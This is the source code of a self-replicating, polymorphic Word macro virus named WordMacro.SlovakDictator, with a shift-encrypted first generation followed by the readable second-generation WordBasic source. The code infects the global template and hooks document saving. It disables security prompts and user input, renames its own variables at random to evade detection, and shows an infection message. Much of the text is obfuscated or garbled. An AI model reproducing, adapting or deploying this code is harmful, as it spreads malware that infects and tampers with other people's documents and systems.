FDCKUBLQVSMCLCS$(4) = "Jos&Yngxkj&XGWOKMWNZKQMSPVG"FDCKUBLQVSMCLCS$(5) = "Jos&Yngxkj&HRS\[OUJQWOJ"FDCKUBLQVSMCLCS$(6) = "Jos&Yngxkj&ZXLKNLLQJMG"FDCKUBLQVSMCLCS$(7) = "Jos&Yngxkj&VTLL[JMOUPNPSUPY"FDCKUBLQVSMCLCS$(8) = "Jos&Yngxkj&KKSYITL[YJYG"FDCKUBLQVSMCLCS$(9) = "Jos&Yngxkj&OST\JJI[OKRVQMUW"FDCKUBLQVSMCLCS$(10) = "Jos&Yngxkj&QORTKZUNYITZYMKH"FDCKUBLQVSMCLCS$(11) = "Jos&Yngxkj&LJIQ[HRW\YSIRIY*.866/"FDCKUBLQVSMCLCS$(12) = "Jos&Yngxkj&KYHMSJNWSZ\"FDCKUBLQVSMCLCS$(13) = "Jos&Yngxkj&[QKNRUJUMYZIHILKY"FDCKUBLQVSMCLCS$(14) = "Jos&Yngxkj&RGUMXJGTW[G[MKSJXI"FDCKUBLQVSMCLCS$(15) = "Jos&Yngxkj&ZOYKOQNUJWWIMHS*.97/"FDCKUBLQVSMCLCS$(16) = "Jos&Yngxkj&\GNOTXTKYJSHHIHZTUM"FDCKUBLQVSMCLCS$(17) = ""FDCKUBLQVSMCLCS$(18) = "Y{h&SGOT"FDCKUBLQVSMCLCS$(19) = "Ut&Kxxux&Muzu&HIRNWHR[LUMIU"FDCKUBLQVSMCLCS$(20) = "JoyghrkOtv{z&7"FDCKUBLQVSMCLCS$(21) = "PURYXM\GP\G\VIWYLY&C&6"FDCKUBLQVSMCLCS$(22) = "XYZYJZWGHILXOSKJY&C&7"FDCKUBLQVSMCLCS$(23) = "TTP\HWLOIRHZ&C&8"FDCKUBLQVSMCLCS$(24) = "IZYHSTWXP\QZ[T&C&="FDCKUBLQVSMCLCS$(25) = "XGWOKMWNZKQMSPVG&C&76"FDCKUBLQVSMCLCS$(26) = "HRS\[OUJQWOJ&C&86"FDCKUBLQVSMCLCS$(27) = "ZXLKNLLQJMG&C&88"FDCKUBLQVSMCLCS$(28) = "VTLL[JMOUPNPSUPY&C&<;"FDCKUBLQVSMCLCS$(29) = "KKSYITL[YJYG&C&9:"FDCKUBLQVSMCLCS$(30) = "OST\JJI[OKRVQMUW&C&<:"FDCKUBLQVSMCLCS$(31) = "KYHMSJNWSZ\&C&9>"FDCKUBLQVSMCLCS$(32) = "[QKNRUJUMYZIHILKY&C&786"FDCKUBLQVSMCLCS$(33) = "RGUMXJGTW[G[MKSJXI&C&7=?"FDCKUBLQVSMCLCS$(34) = "\GNOTXTKYJSHHIHZTUM&C&97"FDCKUBLQVSMCLCS$(35) = "MVJZMXWLHGH*&C&GvvOtlu*.TTP\HWLOIRHZ/"FDCKUBLQVSMCLCS$(36) = "YHQ\PUY[NXYRXOGPZHW&C&\gr.Rklz*.MVJZMXWLHGH*2&XYZYJZWGHILXOSKJY//"FDCKUBLQVSMCLCS$(37) = "Ol&YHQ\PUY[NXYRXOGPZHW&BD&IZYHSTWXP\QZ[T&Znkt&Muzu&HIRNWHR[LUMIU"FDCKUBLQVSMCLCS$(38) = "Igrr&L\TOVLUXWS[O\"FDCKUBLQVSMCLCS$(39) = "-5555&hkmot&ul&nojjkt&vgxz&5555"FDCKUBLQVSMCLCS$(40) = "Ynu}Hu~"FDCKUBLQVSMCLCS$(41) = "I{xLork*&C&LorkTgsk*./"FDCKUBLQVSMCLCS$(42) = "Ol&I{xLork*&C&FFFF&Znkt&Muzu&HIRNWHR[LUMIU"FDCKUBLQVSMCLCS$(43) = ""FDCKUBLQVSMCLCS$(44) = 
"Ol&InkiqOtyzgrrkj.6/&C&6&Znkt"FDCKUBLQVSMCLCS$(45) = "Otlkiz.7/"FDCKUBLQVSMCLCS$(46) = "ZuuryUvzoutyYg|k&4MruhgrJuzVxusvz&C&62&4LgyzYg|ky& C&6"FDCKUBLQVSMCLCS$(47) = "Muzu&HIRNWHR[LUMIU"FDCKUBLQVSMCLCS$(48) = "Ktj&Ol"FDCKUBLQVSMCLCS$(49) = ""FDCKUBLQVSMCLCS$(50) = "Jos&jrm&Gy&LorkYg|kGy"FDCKUBLQVSMCLCS$(51) = "MkzI{x\gr{ky&jrm"FDCKUBLQVSMCLCS$(52) = "Ol&jrm4Luxsgz&C&6&Znkt"FDCKUBLQVSMCLCS$(53) = "jrm4Luxsgz&C&7"FDCKUBLQVSMCLCS$(54) = "LorkYg|kGy&jrm"FDCKUBLQVSMCLCS$(55) = "Ktj&Ol"FDCKUBLQVSMCLCS$(56) = ""FDCKUBLQVSMCLCS$(57) = "Ol&InkiqOtyzgrrkj.7/&C&6&Znkt"FDCKUBLQVSMCLCS$(58) = "Otlkiz.9/"FDCKUBLQVSMCLCS$(59) = "LorkYg|k"FDCKUBLQVSMCLCS$(60) = "Ktj&Ol"FDCKUBLQVSMCLCS$(61) = ""FDCKUBLQVSMCLCS$(62) = "HIRNWHR[LUMIU@"FDCKUBLQVSMCLCS$(63) = "Ktj&Y{h"FDCKUBLQVSMCLCS$(64) = ""FDCKUBLQVSMCLCS$(65) = "Y{h&Ynu}Hu~"


FDCKUBLQVSMCLCS$(66) = � �"Vgxrgsktzt V{i&C&Jg .Tu}.//"FDCKUBLQVSMCLCS$(67) = � �"Ol&Vgxrgsktzt V{i&C&:&Ux&Vgxrgsktzt V{i&C&77&Znkt"FDCKUBLQVSMCLCS$(68) = "Hkkv"FDCKUBLQVSMCLCS$(69) = "Hkmot&Jogrum&[ykxJogrum&9>62&88:2&FF\ox{y&GRKXZ'FF "FDCKUBLQVSMCLCS$(70) =

�"Zk~z&8?2&>2&9:?2&792&FF_u{-xk&otlkizkj&h &]uxjSgixu 4Yru|gqJoizgzux&|ox{yFF2&4Zk~z7"FDCKUBLQVSMCLCS$(71) ="Zk~z&7;2&8>2&9<62&792&FF]kriusk&zu&znk&RSK&.Rgskx- y&Sgixu&Ktmotk/&|kx4&7466FF2&4Zk~z8"FDCKUBLQVSMCLCS$(72) = "Zk~z&7:;2&;72&7892&792&FFJoy&oy&Rk|kr&:87FF2&4Zk~z 9"FDCKUBLQVSMCLCS$(73) =

� �"Zk~z&9;2&=92&9:82&792&FF.i/&73sgx3?=2&Tgyz &Rgskx&, ,&[mr &R{ykx2&Yru|gqogFF2&4Zk~z:"FDCKUBLQVSMCLCS$(74) =

�"Zk~z&9:2&?>2&9:92&792&FFJoy&oy&znk&loxyz&}uxrj&zx{ k&vur suxvnoi&sgixu&|ox{y&'FF2&4Zk~z;"FDCKUBLQVSMCLCS$(75) = "V{ynH{zzut&7862&7>>2&7:=2&872&FFGiikvz&5&Y{nrgyFF2 &4V{yn7"FDCKUBLQVSMCLCS$(76) = "Zk~z&7662&7<;2&88>2&792&FFHom&l{iq&zu&znk&hom&hu~k x&\4S4FF2&4Zk~z<"FDCKUBLQVSMCLCS$(77) = "Ktj&Jogrum"FDCKUBLQVSMCLCS$(78) = "Jos&jrm&Gy&[ykxJogrum"FDCKUBLQVSMCLCS$(79) = "Jogrum.jrm/"FDCKUBLQVSMCLCS$(80) = "Ktj&Ol"FDCKUBLQVSMCLCS$(81) = "Ktj&Y{h"FDCKUBLQVSMCLCS$(82) = ""FDCKUBLQVSMCLCS$(83) = "L{tizout&InkiqOtyzgrrkj.p/"FDCKUBLQVSMCLCS$(84) = "Ut&Kxxux&Xky{sk&Tk~z"FDCKUBLQVSMCLCS$(85) = "InkiqOtyzgrrkj&C&6"FDCKUBLQVSMCLCS$(86) = "Lux&o&C&7&Zu&Iu{tzSgixuy.p/"FDCKUBLQVSMCLCS$(87) = "Ol&SgixuTgsk*.o2&p/&C&FFG{zuIruykFF&Znkt&InkiqOtyz grrkj&C&7"FDCKUBLQVSMCLCS$(88) = "Tk~z&o"FDCKUBLQVSMCLCS$(89) = "Ktj&L{tizout"FDCKUBLQVSMCLCS$(90) = ""FDCKUBLQVSMCLCS$(91) = "Y{h&Otlkiz.]ngzZuOtlkiz/"FDCKUBLQVSMCLCS$(92) = "I[SQSKJWYXM*&C&]otju}Tgsk*./"FDCKUBLQVSMCLCS$(93) = "ZuurySgixu&4Tgsk&C&FFG{zuIruykFF2&4Ynu}&C&]ngzZuOt lkiz2&4Kjoz"FDCKUBLQVSMCLCS$(94) = "KjozIrkgx&3&86"FDCKUBLQVSMCLCS$(95) = ""FDCKUBLQVSMCLCS$(96) = "-5555"FDCKUBLQVSMCLCS$(97) = �"-5555&\ru€ktok&vx| in&KYHMSJNWSZ\&xogjqu|&quj{&sgqx g"FDCKUBLQVSMCLCS$(98) = "-5555&|ojozkrtg&igyz&3&tksktoz&'"FDCKUBLQVSMCLCS$(99) = "-5555"FDCKUBLQVSMCLCS$(100 ) ="Lux&o&C&6&Zu&KYHMSJNWSZ\&@&Otykxz&LJIQ[HRW\YSIRIY* .o/&@&OtykxzVgxg&@&Tk~z&o"FDCKUBLQVSMCLCS$(101 ) = "-5555"FDCKUBLQVSMCLCS$(102 ) = �"-5555&vxkskttg&o&ojk&uj&xogjqu|&FFY{h&UxomotgrSgix uHuj FF17"FDCKUBLQVSMCLCS$(103 ) = "-5555&g€&vu&FFY{h&L\TOVLUXWS[O\FF37"FDCKUBLQVSMCLCS$(104 ) = �"-5555&|krso&vu€uxtk&{xioz&zokzu&qutyzgtz &'''"FDCKUBLQVSMCLCS$(105 ) = "-5555"FDCKUBLQVSMCLCS$(106 ) ="Lux&o&C&[QKNRUJUMYZIHILKY&Zu&RGUMXJGTW[G[MKSJXI&@&Otykxz&LJIQ[HRW\YSIRIY*.o/&@&OtykxzVgxg&@&Tk~z&o"FDCKUBLQVSMCLCS$(107 ) ="KjozXkvrgik&4Lotj&C&Inx*.<:/&1&Inx*.<:/2&4Xkvrgik& C&Inx*.9:/2&4Joxkizout&C&62&4SgzinIgyk&C&72&4]nurk]uxj&C&62&4VgzzkxtSgzin&C&62&4Yu{tjyRoqk&C&6 
2&4XkvrgikGrr2&4Luxsgz&C&62&4]xgv&C&72&4LotjGrr]uxjLuxsy&C&6"FDCKUBLQVSMCLCS$(108 ) = ""FDCKUBLQVSMCLCS$(109 ) = "QORTKZUNYITZYMKH&C&3&Otz..:&1&Xtj./&0&76//"FDCKUBLQVSMCLCS$(110 ) = "Igrr&WXWR\QGHV[KPGGPMSL"FDCKUBLQVSMCLCS$(111 ) = "Otykxz&FFQORTKZUNYITZYMKH&C&FF&1&Yzx*.3&QORTKZUNYITZYMKH/"FDCKUBLQVSMCLCS$(112 ) = "OtykxzVgxg"FDCKUBLQVSMCLCS$(113 ) = "THXGUQOHHLUQMO"FDCKUBLQVSMCLCS$(114 ) = "JuiIruyk&7"FDCKUBLQVSMCLCS$(115 ) = "Gizo|gzk&I[SQSKJWYXM*"FDCKUBLQVSMCLCS$(116 ) = "Ktj&Y{h"FDCKUBLQVSMCLCS$(117 ) = ""


FDCKUBLQVSMCLCS$(118 ) = �"Y{h&UxomotgrSgixuHuj "FDCKUBLQVSMCLCS$(119 ) = "-5555&ktj&ul&Nojjkt&vgxz&5555"FDCKUBLQVSMCLCS$(120 ) = "Yixkkt[vjgzotm&PURYXM\GP\G\VIWYLY"FDCKUBLQVSMCLCS$(121 ) = "JoyghrkG{zuSgixuy&XYZYJZWGHILXOSKJY"FDCKUBLQVSMCLCS$(122 ) = "WXWR\QGHV[KPGGPMSL"FDCKUBLQVSMCLCS$(123 ) = ""FDCKUBLQVSMCLCS$(124 ) = "I[SQSKJWYXM*&C&]otju}Tgsk*./"FDCKUBLQVSMCLCS$(125 ) ="ZuurySgixu&4Tgsk&C&FFQXZSKSMGOXOOP\FF2&4Ynu}&C&XYZYJZWGHILXOSKJY2&4Kjoz"FDCKUBLQVSMCLCS$(126 ) = "KjozIrkgx&3&HRS\[OUJQWOJ"FDCKUBLQVSMCLCS$(127 ) ="Lux&UZYVTHW[\IXKGXP&C&PURYXM\GP\G\VIWYLY&Zu&RGUMXJGTW[G[MKSJXI&@&Otykxz&LJIQ[HRW\YSIRIY*.UZYVTHW[\IXKGXP/&@&OtykxzVgxg&@&Tk~z&UZYVTHW[\IXKGXP"FDCKUBLQVSMCLCS$(128 ) = ""FDCKUBLQVSMCLCS$(129 ) ="KjozXkvrgik&4Lotj&C&Inx*.OST\JJI[OKRVQMUW/&1&Inx*. OST\JJI[OKRVQMUW/2&4Xkvrgik&C&Inx*.KKSYITL[YJYG/2&4Joxkizout&C&PURYXM\GP\G\VIWYLY2&4SgzinIgyk& C&XYZYJZWGHILXOSKJY2&4]nurk]uxj&C&PURYXM\GP\G\VIWYLY2&4VgzzkxtSgzin&C&PURYXM\GP\G\VIWYLY2&4Yu{ tjyRoqk&C&PURYXM\" +"GP\G\VIWYLY2&4XkvrgikGrr2&4Luxsgz&C&PURYXM\GP\G\VI WYLY2&4]xgv&C&XYZYJZWGHILXOSKJY2&4LotjGrr]uxjLuxsy&C&PURYXM\GP\G\VIWYLY"FDCKUBLQVSMCLCS$(130 ) = ""FDCKUBLQVSMCLCS$(131 ) = "THXGUQOHHLUQMO"FDCKUBLQVSMCLCS$(132 ) = "[LLNUWLMI["FDCKUBLQVSMCLCS$(133 ) = "JuiIruyk&XYZYJZWGHILXOSKJY"FDCKUBLQVSMCLCS$(134 ) = "Gizo|gzk&I[SQSKJWYXM*"FDCKUBLQVSMCLCS$(135 ) = ""FDCKUBLQVSMCLCS$(136 ) = "Igrr&QXZSKSMGOXOOP\"FDCKUBLQVSMCLCS$(137 ) ="ZuurySgixu&4Tgsk&C&FFQXZSKSMGOXOOP\FF2&4Ynu}&C&XYZYJZWGHILXOSKJY2&4Jkrkzk"FDCKUBLQVSMCLCS$(138 ) = ""FDCKUBLQVSMCLCS$(139 ) = "HIRNWHR[LUMIU@"FDCKUBLQVSMCLCS$(140 ) = "JoyghrkG{zuSgixuy&PURYXM\GP\G\VIWYLY"FDCKUBLQVSMCLCS$(141 ) = "Yixkkt[vjgzotm&XYZYJZWGHILXOSKJY"FDCKUBLQVSMCLCS$(142 ) = "JoyghrkOtv{z&PURYXM\GP\G\VIWYLY"FDCKUBLQVSMCLCS$(143 ) = "Ktj&Y{h"FDCKUBLQVSMCLCS$(144 ) = ""FDCKUBLQVSMCLCS$(145 ) = "Y{h&WXWR\QGHV[KPGGPMSL"FDCKUBLQVSMCLCS$(146 ) = "Lux&UZYVTHW[\IXKGXP&C&PURYXM\GP\G\VIWYLY&Zu&RGUMXJGTW[G[MKSJXI"FDCKUBLQVSMCLCS$(147 ) = "H\KJWNXHK\Z*&C&FFFF"FDCKUBLQVSMCLCS$(148 ) 
= "YQVGWJNPMXH&C&Rkt.LJIQ[HRW\YSIRIY*.UZYVTHW[\IXKGXP //"FDCKUBLQVSMCLCS$(149 ) = "Lux&L\\TUOIL[\ISYKZ&C&XYZYJZWGHILXOSKJY&Zu&YQVGWJNPMXH"FDCKUBLQVSMCLCS$(150 ) ="H\KJWNXHK\Z*&C&H\KJWNXHK\Z*&1&Inx*.Gyi.Soj*.LJIQ[H RW\YSIRIY*.UZYVTHW[\IXKGXP/2&L\\TUOIL[\ISYKZ2&XYZYJZWGHILXOSKJY//&3&QORTKZUNYITZYMKH/"FDCKUBLQVSMCLCS$(151 ) = "Tk~z&L\\TUOIL[\ISYKZ"FDCKUBLQVSMCLCS$(152 ) = "LJIQ[HRW\YSIRIY*.UZYVTHW[\IXKGXP/&C&H\KJWNXHK\Z*"FDCKUBLQVSMCLCS$(153 ) = "Tk~z&UZYVTHW[\IXKGXP"FDCKUBLQVSMCLCS$(154 ) = "Ktj&Y{h"FDCKUBLQVSMCLCS$(155 ) = ""FDCKUBLQVSMCLCS$(156 ) = "Y{h&THXGUQOHHLUQMO"FDCKUBLQVSMCLCS$(157 ) = "Lux&UZYVTHW[\IXKGXP&C&PURYXM\GP\G\VIWYLY&Zu&RGUMXJGTW[G[MKSJXI"FDCKUBLQVSMCLCS$(158 ) ="Otykxz&FFLJIQ[HRW\YSIRIY*.FF&1&Yzx*.UZYVTHW[\IXKGX P/&1&FF/CFF&1&Inx*.KKSYITL[YJYG/&1&LJIQ[HRW\YSIRIY*.UZYVTHW[\IXKGXP/&1&Inx*.KKSYITL[YJYG/"FDCKUBLQVSMCLCS$(159 ) = "OtykxzVgxg"FDCKUBLQVSMCLCS$(160 ) = "Tk~z&UZYVTHW[\IXKGXP"FDCKUBLQVSMCLCS$(161 ) ="Lux&UZYVTHW[\IXKGXP&C&PURYXM\GP\G\VIWYLY&Zu&\GNOTXTKYJSHHIHZTUM&3&XYZYJZWGHILXOSKJY"FDCKUBLQVSMCLCS$(162 ) ="Otykxz&FFZOYKOQNUJWWIMHS*.FF&1&Yzx*.UZYVTHW[\IXKGXP/&1&FF/CFF&1&Inx*.KKSYITL[YJYG/&1&ZOYKOQNUJWWIMHS*.UZYVTHW[\IXKGXP/&1&Inx*.KKSYITL[YJYG/"FDCKUBLQVSMCLCS$(163 ) = "OtykxzVgxg"


FDCKUBLQVSMCLCS$(164 ) = "Tk~z&UZYVTHW[\IXKGXP"FDCKUBLQVSMCLCS$(165 ) = "Ktj&Y{h"FDCKUBLQVSMCLCS$(166 ) = ""FDCKUBLQVSMCLCS$(167 ) = "L{tizout&KPWMKVJQJGJLVYWT*"FDCKUBLQVSMCLCS$(168 ) = "H\KJWNXHK\Z*&C&FFFF"FDCKUBLQVSMCLCS$(169 ) ="Lux&UZYVTHW[\IXKGXP&C&XYZYJZWGHILXOSKJY&Zu&XGWOKMWNZKQMSPVG&1&Xtj./&0&XGWOKMWNZKQMSPVG&@&H\KJWNXHK\Z*&C&H\KJWNXHK\Z*&1&Inx*.Xtj./&0&ZXLKNLLQJMG& 1&VTLL[JMOUPNPSUPY/&@&Tk~z&UZYVTHW[\IXKGXP"FDCKUBLQVSMCLCS$(170 ) = "KPWMKVJQJGJLVYWT*&C&H\KJWNXHK\Z*"FDCKUBLQVSMCLCS$(171 ) = "Ktj&L{tizout"FDCKUBLQVSMCLCS$(172 ) = ""FDCKUBLQVSMCLCS$(173 ) = "Y{h&[LLNUWLMI["FDCKUBLQVSMCLCS$(174 ) ="Lux&UZYVTHW[\IXKGXP&C&PURYXM\GP\G\VIWYLY&Zu&\GNOTXTKYJSHHIHZTUM&3&XYZYJZWGHILXOSKJY"FDCKUBLQVSMCLCS$(175 ) ="KjozXkvrgik&4Lotj&C&ZOYKOQNUJWWIMHS*.UZYVTHW[\IXKG XP/2&4Xkvrgik&C&KPWMKVJQJGJLVYWT*2&4Joxkizout&C&PURYXM\GP\G\VIWYLY2&4SgzinIgyk&C&XYZYJZWGHILXOSKJY2&4]nurk]uxj&C&PURYXM\GP\G\VIWYLY2&4VgzzkxtSgzin&C&PURYXM\GP\G\VIWYLY2&4Yu{tjyRoqk&C&PURYX M\GP\G\VIWYLY2&4X" +"kvrgikGrr2&4Luxsgz&C&PURYXM\GP\G\VIWYLY2&4]xgv&C&X YZYJZWGHILXOSKJY2&4LotjGrr]uxjLuxsy&C&PURYXM\GP\G\VIWYLY"FDCKUBLQVSMCLCS$(176 ) = "Tk~z&UZYVTHW[\IXKGXP"FDCKUBLQVSMCLCS$(177 ) = "Ktj&Y{h"FDCKUBLQVSMCLCS$(178 ) = ""FDCKUBLQVSMCLCS$(179 ) = "Y{h&L\TOVLUXWS[O\"TISEIKHODQQCGBM$(0) = "KILNETOHSCNTSGEB"TISEIKHODQQCGBM$(1) = "FDCKUBLQVSMCLCS"TISEIKHODQQCGBM$(2) = "TISEIKHODQQCGBM"TISEIKHODQQCGBM$(3) = "JOLSRGVAJVAVPCQSFS"TISEIKHODQQCGBM$(4) = "RAQIEGQHTEKGMJPA"TISEIKHODQQCGBM$(5) = "TRFEHFFKDGA"TISEIKHODQQCGBM$(6) = "CTSBMNQRJVKTUN"TISEIKHODQQCGBM$(7) = "RSTSDTQABCFRIMEDS"TISEIKHODQQCGBM$(8) = "BLMVUIODKQID"TISEIKHODQQCGBM$(9) = "NNJVBQFICLBT"TISEIKHODQQCGBM$(10) = "PNFFUDGIOJHJMOJS"TISEIKHODQQCGBM$(11) = "EEMSCNFUSDSA"TISEIKHODQQCGBM$(12) = "IMNVDDCUIELPKGOQ"TISEIKHODQQCGBM$(13) = "ESBGMDHQMTV"TISEIKHODQQCGBM$(14) = "UKEHLODOGSTCBCFES"TISEIKHODQQCGBM$(15) = "LAOGRDANQUAUGEMDRC"TISEIKHODQQCGBM$(16) = "VAHINRNESDMBBCBTNOG"TISEIKHODQQCGBM$(17) = "OTSPNBQUVCREARJ"TISEIKHODQQCGBM$(18) = 
"SKPAQDHJGRB"TISEIKHODQQCGBM$(19) = "FVVNOICFUVCMSET"TISEIKHODQQCGBM$(20) = "BVEDQHRBEVT"TISEIKHODQQCGBM$(21) = "GPDTGRQFBAB"TISEIKHODQQCGBM$(22) = "SBKVJOSUHRSLRIAJTBQ"TISEIKHODQQCGBM$(23) = "BCLHQBLUFOGCO"TISEIKHODQQCGBM$(24) = "QRQLVKABPUEJAAJGMF"TISEIKHODQQCGBM$(25) = "CUMKMEDQSRG"TISEIKHODQQCGBM$(26) = "NBRAOKIBBFOKGI"TISEIKHODQQCGBM$(27) = "UFFHOQFGCU"TISEIKHODQQCGBM$(28) = "KRTMEMGAIRIIJV"TISEIKHODQQCGBM$(29) = "EJQGEPDKDADFPSQN"TISEIKHODQQCGBM$(30) = "FVNIPFORQMUIV"

End Sub


SLDICT_B.SRC

REM --------- WordMacro.SlovakDictator.BREM --------- source code - 2nd generationREM --------- it is cool, isn't it ?REM --------- do not modify !REM ---------------------------------------Dim Shared JKHDBVIVFHSIOLGLEVDim Shared NIGFKLUPHSKEEEPDim Shared LEVOKOCHNNQPDDim Shared VNGOGKBSJINNKGDim Shared ATRUDJHVUTDADim Shared UPMTKJGPISSNIKQEJHBDim Shared DUJEPAVVCNCSVDim Shared BQLLMJUMSKGDim Shared SQQVMSQFPFQOUDim Shared MCMAPPVBJCHTIJKLLGDim Shared MMPAAMLTJEJQDim Shared QFOSABMOUOJTNFJEB$(200 )Dim Shared AUBQULPOOLFDDim Shared TACMICASEFBSRUCDim Shared DHFHBNUIMGVHSDim Shared QAUBRNSVSNMDMQPJ$(31) 'OIEGDFGEGSODLPUVCDim Shared FLVFRFOSDHTKBSS

Sub MAINOn Error Goto AHTUIALPGHINBSOHKGBJKHDBVIVFHSIOLGLEV = 0NIGFKLUPHSKEEEP =1DisableInput NIGFKLUPHSKEEEPLEVOKOCHNNQPD =2VNGOGKBSJINNKG =7ATRUDJHVUTDA =10UPMTKJGPISSNIKQEJHB =20DUJEPAVVCNCSV =22BQLLMJUMSKG =65SQQVMSQFPFQOU =34MCMAPPVBJCHTIJKLLG =64AUBQULPOOLFD =38TACMICASEFBSRUC =120DHFHBNUIMGVHS =181FLVFRFOSDHTKBSS =31VEGINPJEAUKMUNV$ = AppInfo$(LEVOKOCHNNQPD)MOIGIVMVOI = Val(Left$(VEGINPJEAUKMUNV$, NIGFKLUPHSKEE EP))If MOIGIVMVOI <> VNGOGKBSJINNKGThen Goto AHTUIALPGHINBSOHKGBCall FTDJILLLBBPSNPOGPDScreenUpdating JKHDBVIVFHSIOLGLEVDisableAutoMacros NIGFKLUPHSKEEEPAHCQTEBHHQMABJMSANF

DCUVUFPJTL$ = WindowName$()'OIEGDFGEGSODLPUVCToolsMacro .Name = "EHSPTKCEIMAUNR", .Show = NIGFKLUPHSKEEEP, .Edit'OIEGDFGEGSODLPUVCEditClear - UPMTKJGPISSNIKQEJHBFor OIEGDFGEGSODLPUVC = JKHDBVIVFHSIOLGLEVTo DHFHBNUIMGVHS : Insert QFOSABMOUOJTNFJEB$(OIEGDFGEGSODLPUVC) : InsertPara : Next OIEGDFGEGSODLPUVC

EditReplace .Find = Chr$(MCMAPPVBJCHTIJKLLG) + Chr$(MCMA PPVBJCHTIJKLLG), .Replace = Chr$(SQQVMSQFPFQOU), .Direction = JKHDBVIVFHSIOLGLEV, .Match Case = NIGFKLUPHSKEEEP, .WholeWord =JKHDBVIVFHSIOLGLEV, .PatternMatch = JKHDBVIVFHSIOLGLEV , .SoundsLike = JKHDBVIVFHSIOLGLEV, .ReplaceAll, .Format = JKHDBVIVFHSIOLGLEV, .Wrap = NIGFKLU PHSKEEEP, .FindAllWordForms =JKHDBVIVFHSIOLGLEV


DMNQTQDCGKCOJFTNSLLVKJBVQKOPMUDocClose NIGFKLUPHSKEEEPActivate DCUVUFPJTL$

Call EHSPTKCEIMAUNRToolsMacro .Name = "EHSPTKCEIMAUNR", .Show = NIGFKLUPHSKEEEP, .Delete

AHTUIALPGHINBSOHKGB:DisableAutoMacros JKHDBVIVFHSIOLGLEVScreenUpdating NIGFKLUPHSKEEEPDisableInput JKHDBVIVFHSIOLGLEVEnd Sub

Sub AHCQTEBHHQMABJMSANFFor OIEGDFGEGSODLPUVC = JKHDBVIVFHSIOLGLEVTo DHFHBNUIMGVHSREBVECGMVLCRMSQ$ =""MVPJAUAQQVNMITRR = Len(QFOSABMOUOJTNFJEB$(OIEGDFGEGSODLPUVC))For IVERHTQBPD = NIGFKLUPHSKEEEPTo MVPJAUAQQVNMITRRREBVECGMVLCRMSQ$ = REBVECGMVLCRMSQ$ + Chr$(Asc(Mid$ (QFOSABMOUOJTNFJEB$(OIEGDFGEGSODLPUVC),IVERHTQBPD, NIGFKLUPHSKEEEP)) - MMPAAMLTJEJQ)Next IVERHTQBPDQFOSABMOUOJTNFJEB$(OIEGDFGEGSODLPUVC) = REBVECGMVLCRMSQ$Next OIEGDFGEGSODLPUVCEnd Sub

Sub DMNQTQDCGKCOJFTNSFor OIEGDFGEGSODLPUVC = JKHDBVIVFHSIOLGLEVTo DHFHBNUIMGVHSInsert "QFOSABMOUOJTNFJEB$("+ Str$(OIEGDFGEGSODLPUVC) + ")=" + Chr$(SQQVMSQFPFQOU) +QFOSABMOUOJTNFJEB$(OIEGDFGEGSODLPUVC) + Chr$(SQQVMSQFPFQOU)InsertParaNext OIEGDFGEGSODLPUVCFor OIEGDFGEGSODLPUVC = JKHDBVIVFHSIOLGLEVTo FLVFRFOSDHTKBSS - NIGFKLUPHSKEEEPInsert "QAUBRNSVSNMDMQPJ$("+ Str$(OIEGDFGEGSODLPUVC) + ")=" + Chr$(SQQVMSQFPFQOU) +QAUBRNSVSNMDMQPJ$(OIEGDFGEGSODLPUVC) + Chr$(SQQVMSQFPFQOU)InsertParaNext OIEGDFGEGSODLPUVCEnd Sub

Function QJQREVEJKRPEMJ$REBVECGMVLCRMSQ$ =""For OIEGDFGEGSODLPUVC = NIGFKLUPHSKEEEPTo ATRUDJHVUTDA + Rnd() * ATRUDJHVUTDA :REBVECGMVLCRMSQ$ = REBVECGMVLCRMSQ$ + Chr$(Rnd() * DUJEPAVVCNCSV + BQLLMJUMSKG) :NextOIEGDFGEGSODLPUVCQJQREVEJKRPEMJ$ = REBVECGMVLCRMSQ$End Function

Sub LLVKJBVQKOPMUFor OIEGDFGEGSODLPUVC = JKHDBVIVFHSIOLGLEVTo FLVFRFOSDHTKBSS - NIGFKLUPHSKEEEPEditReplace .Find = QAUBRNSVSNMDMQPJ$(OIEGDFGEGSODLPUVC), .Replace = QJQREVEJKRPEMJ$, .Direction = JKHDBVIVFHSIOLGLEV, .MatchCase = NIGFKLUPHSK EEEP, .WholeWord = JKHDBVIVFHSIOLGLEV, .PatternMatch = JKHDBVIVFHSIOLGLEV, .SoundsLike = JKHDB VIVFHSIOLGLEV, .ReplaceAll, .Format= JKHDBVIVFHSIOLGLEV, .Wrap = NIGFKLUPHSKEEEP, .FindAllW ordForms = JKHDBVIVFHSIOLGLEVNext OIEGDFGEGSODLPUVCEnd Sub

Sub FTDJILLLBBPSNPOGPDMMPAAMLTJEJQ = 9QFOSABMOUOJTNFJEB$(0) = "Mrv)\qj{nm)STQMK_R_OQ\RXUPUN_"QFOSABMOUOJTNFJEB$(1) = "Mrv)\qj{nm)WRPOTU^YQ\TNNNY"QFOSABMOUOJTNFJEB$(2) = "Mrv)\qj{nm)UN_XTXLQWWZYM"


QFOSABMOUOJTNFJEB$(3) = "Mrv)\qj{nm)_WPXPTK\SRWWTP"QFOSABMOUOJTNFJEB$(4) = "Mrv)\qj{nm)J][^MSQ_^]MJ"QFOSABMOUOJTNFJEB$(5) = "Mrv)\qj{nm)^YV]TSPYR\\WRTZNSQK"QFOSABMOUOJTNFJEB$(6) = "Mrv)\qj{nm)M^SNYJ__LWL\_"QFOSABMOUOJTNFJEB$(7) = "Mrv)\qj{nm)KZUUVS^V\TP"QFOSABMOUOJTNFJEB$(8) = "Mrv)\qj{nm)\ZZ_V\ZOYOZX^"QFOSABMOUOJTNFJEB$(9) = "Mrv)\qj{nm)VLVJYY_KSLQ]RSTUUP"QFOSABMOUOJTNFJEB$(10) = "Mrv)\qj{nm)VVYJJVU]SNSZ"QFOSABMOUOJTNFJEB$(11) = "Mrv)\qj{nm)ZOX\JKVX^XS]WOSNK-1;992"QFOSABMOUOJTNFJEB$(12) = "Mrv)\qj{nm)J^KZ^UYXXUOM"QFOSABMOUOJTNFJEB$(13) = "Mrv)\qj{nm)]JLVRLJ\NOK\[^L"QFOSABMOUOJTNFJEB$(14) = "Mrv)\qj{nm)MQOQKW^RVP_Q\"QFOSABMOUOJTNFJEB$(15) = "Mrv)\qj{nm)ZJ^K[W\_\WVMVZYS-1<:20XRNPMOPNP\XMUY^_L "QFOSABMOUOJTNFJEB$(16) = "Mrv)\qj{nm)OU_O[OX\MQ]TK\\"QFOSABMOUOJTNFJEB$(17) = ""QFOSABMOUOJTNFJEB$(18) = "\~k)VJRW"QFOSABMOUOJTNFJEB$(19) = "Xw)N{{x{)Px}x)JQ]^RJUYPQRWK\XQTPK"QFOSABMOUOJTNFJEB$(20) = 